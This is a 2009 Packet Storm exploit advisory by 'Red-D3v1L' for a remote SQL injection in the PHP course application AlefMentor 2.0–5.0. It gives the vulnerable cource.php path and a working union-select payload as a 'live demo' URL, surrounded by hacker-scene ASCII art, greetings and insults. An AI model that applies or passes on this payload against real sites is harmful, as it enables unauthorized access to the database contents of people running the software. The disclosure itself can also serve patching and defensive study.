AlefMentor 5.0 SQL Injection

2009-12-08T00:00:00
ID PACKETSTORM:83583
Type packetstorm
Reporter Red-D3v1L
Modified 2009-12-08T00:00:00

Description

                                        
                                            `  
view source  
print?  
_ _ _ _ _ _ _ _ _ _ _ _ _ _ __ _ _ _ _ _____1337~h4x0rZ__ _ ___ ___  
/_/Rd_ _ / _ _\/ _ _ / \ \< |/_ _ / /\ | \ /\ || \( ) /\ | \ (| |  
\_ _ _ _/ /_ _ / / __ | () / | | / / [d0t]com/@~\ | (O) / /+~\ ||_O_|( ) /0O\ | \ | |  
_ _ _ _\ \_ _ \ \ _ _ _ | \ | | / /_ _ /|__|\ | \ /|__|\|| O |( ) /+__+\| ^ \ | |  
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\__\ |__|/_ _ _ _ _\ /\| |/\|__|\__\( ) ( )|___/(_)/\| |/\__\__\|_ >  
  
  
==============================================================================  
[ª] ~ Note : Hacker R0x Lamerz Sux !  
==============================================================================  
[ª] AlefMentor 2.0 <== 5.0 (id) Remote SQL Injection Vulnerability  
==============================================================================  
[ª] my home: [ http://sec-r1z.com ]  
[ª] Script: [ AlefMentor 2.0 ]  
[ª] Language: [ PHP ]  
[ª] Download [ http://alefmentor.mac.findmysoft.com/ ]  
[ª] Founder: [ ./Red-D3v1L ]  
[ª] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - my love :$ ]  
[ª] Fuck to : [ All LamErZ And n00bz ]  
########################################################################  
  
===[ Exploit SQL ]===   
  
[ª] [Path]/cource.php?action=pregled&cont_id=[SQL]  
  
[ª] Live dem0 :  
  
http://www.site.com/am/cource.php?action=pregled&cont_id=21&courc_id=-2+union+select+version%28%29--  
  
  
Author: Red-D3v1L <-  
  
###########################################################################  
  
`